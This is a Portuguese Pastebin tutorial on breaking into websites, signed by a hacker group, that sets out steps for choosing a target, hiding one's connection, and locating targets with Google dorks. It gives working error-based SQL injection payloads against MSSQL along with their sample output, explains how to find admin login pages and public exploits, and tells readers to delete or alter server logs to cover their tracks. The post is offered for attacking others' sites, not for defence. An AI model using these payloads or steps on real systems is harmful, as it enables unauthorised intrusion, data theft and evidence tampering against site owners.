Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $$$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$$\ $$$$$$$\
- $$ _____| \__|$$ |$$ __$$\ $$ __$$\ $$ __$$\
- $$ | $$$$$$\ $$\ $$ |$$ / \__| $$$$$$\ $$$$$$$\ $$ | $$ |$$ | $$ |
- $$$$$\ \____$$\ $$ |$$ |\$$$$$$\ $$ __$$\ $$ _____|$$$$$$$\ |$$$$$$$ |
- $$ __|$$$$$$$ |$$ |$$ | \____$$\ $$$$$$$$ |$$ / $$ __$$\ $$ __$$<
- $$ | $$ __$$ |$$ |$$ |$$\ $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |
- $$ | \$$$$$$$ |$$ |$$ |\$$$$$$ |\$$$$$$$\ \$$$$$$$\ $$$$$$$ |$$ | $$ |
- \__| \_______|\__|\__| \______/ \_______| \_______|\_______/ \__| \__|
- Steps to a basic invasion by: @Spirit_Hacker1 | @FailSecurityBR
- =================================================================================================================================================
- Hoje trago para vocês um tutorial básico sobre invasão.
- 1 - Procurar um site ...
- 2 - Camuflar sua própria conexão.
- 3 - Procurar falhas conhecidas
- 4 - Procurar falhas não conhecidas [Caso não encontre conhecidas. (Este tutorial é básico, então não veremos esta parte)]
- 5 - Descobrir nível de segurança (Do servidor/site)
- 6 - Descobrir um modo de entrar dentro do sistema (Páginas de Login, modos de conexão ...)
- 7 - Apagando rastros
- ================================================================================================================================================
- PROCURANDO UM SITE
- Usarei como exemplo a minha densa atração por sites WordPress...
- Usarei o exemplo padrão de todos ... O site.com rsrs...
- Encontrado site: www.site.com/wp-content/galery-index
- Pegamos então a parte principal da URL, chamada de DOMÍNIO
- Passamos para o segundo passo.
- =================================================================================================================================================
- CAMUFLANDO A CONEXÃO
- Modos de camuflagem:
- ♦ Proxy: Nada mais é do que retornos de conexão entre sua maquina e a maquina escolhida para camuflagem, entretanto enviando pacotes através do servidor (Servidor do proxy) e não de sua propria rede.
- ♦ Esconder / Mudar MAC address: Endereços MAC são os endereços utilizados na rede através da interface de comunicação.
- ♦ Buscar ao máximo deixar os retornos de dados da conexão privativos entre sua maquina e seu provedor. (Tente não se conectar com outra rede)
- Existem outros modos como manipulação de rota e etc, porém este é um tutorial básico
- Usarei como exemplo o proxy:
- Busco encontrar um servidor de proxy confiável
- Abrindo o navegador (estou usando Firefox) >> Ferramentas >> Opções >> Avançadas >> Rede.
- Clico em configurar conexão >> Endereço para configurar uma conexão automatica de proxy
- Após colocarmos o endereço de rede do proxy está feito
- ================================================================================================================================================
- PROCURANDO FALHAS
- A cada dia que se passa tornam-se mais faceis e viáveis as buscas de falhas em sites e servidores, uma só TOOL (Ferramenta) pode trazer uma lista de falhas (às vezes tanto do site quanto do servidor).
- Bom como é um tutorial básico passarei informações bem conhecidas de como se procurar falhas.
- ♦ O famoso sabe tudo GOOGLE ajuda muito à iniciantes através de dorks...
- Dork de exemplo: inurl:/index.asp?id=1 & site:site.com < Procura sites com a variavel id=1 sendo programado em asp, contudo o site deve possuir domínio site.com
- ♦ Caso queira invadir um servidor, recomendo o uso do NMAP. (Mas não entraremos com invasão a servidores ainda)
- ♦ Supondo que encontremos a url: www.site.com/site/index.asp?id=1 e contenha a falha dentro do banco de dados SQL (Saberemos usando a string >> ' << a aspa unica)
- Caso o site esteja vulnerável a SQL injection (o básico dos básicos) aparecerá na tela uma mensagem retornando o erro como por exemplo:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND A.ID_USUARIO = B.ID AND A.ARTIGO_NOTICIA='N' ORDER BY DATA DESC' at line 1
- Neste caso usaremos o comando convert (Por exemplo) para converter os valores e fazer uma consulta dentro do BD (Banco de dados).
- ficando assim:
- - www.site.com/site/index.asp?id=convert(int,(@@version))--
- Retornando a versão do servidor SQL como:
- Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
- Seguimos a consulta de dados usando a consulta de USER mudando a parte onde está @@version para apenas user e ficando assim
- - www.site.com/site/index.asp?id=convert(int,(user))--
- Retornando o usuario do banco de dados como:
- usuario_bd
- Continuando usaremos agora o comando SELECT, selecionando dados do sistema, veja:
- -www.site.com/site/index.asp?id=convert(int,(select top 1 name from sysobjects where xtype=char((85))))--
- Que retornará a table padrão (provável do usuario) como:
- Cat_AreaAdministrativa
- Sendo assim é só continuarmos a consulta, para não gastar tempo deixarei um vídeo do Otávio Ribeiro onde ele explora MSSQL [http://otavioribeiro.com/videos/MSSQL.html]
- ======================================================================================================================================
- DESCOBRINDO NÍVEL DE SEGURANÇA
- SITE: Buscar informações sobre provedor de host e etc... veja se não possuem mais de um modo de guardar logs para facilitar com que se apaguem os vestigios (rastros) da invasão.
- Servidor: Procurar principalmente saber se não existe algum tipo de HONEYPOT (pote de mel), ou similar, para que você não fique totalmente exposto.
- Modos de descobrir:
- - Provedores de host deixam muitas vezes nos próprios termos de contrato, informações sobre a segurança...
- - NMAP (já citado anteriormente), usando de alguns scripts pode muitas vezes indentificar softwares de conexão com as portas abertas ...
- ========================================================================================================================================
- PROCURANDO MODOS DE ADMINISTRAR O SISTEMA
- SITE: Buscando paginas de login ou algo referente com acesso total.
- google.com + site.com/ "Admin Login" por exemplo.
- ou até mesmo: site:site.com/ & intitle:Login Page
- SERVIDORES: Busca de exploits para falhas encontradas.
- exploit-db.com é um dos sites usados para a busca de exploits
- ==========================================================================================================================================
- APAGANDO OS PRÓPRIOS RASTROS
- Em ambas situações (site/servidor) o sistema guardará logs, procure conseguir acesso a essses logs e se possível apague-os ou modifique-os...
- ==========================================================================================================================================
- Bom, é isso no próximo tutorial explicarei como ter acesso ROOT pela shell
- Greetz: TalibGirl | Cracker_SI | ManiaticSoft | CoRiNgA CrAcKeR | D3T00R
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement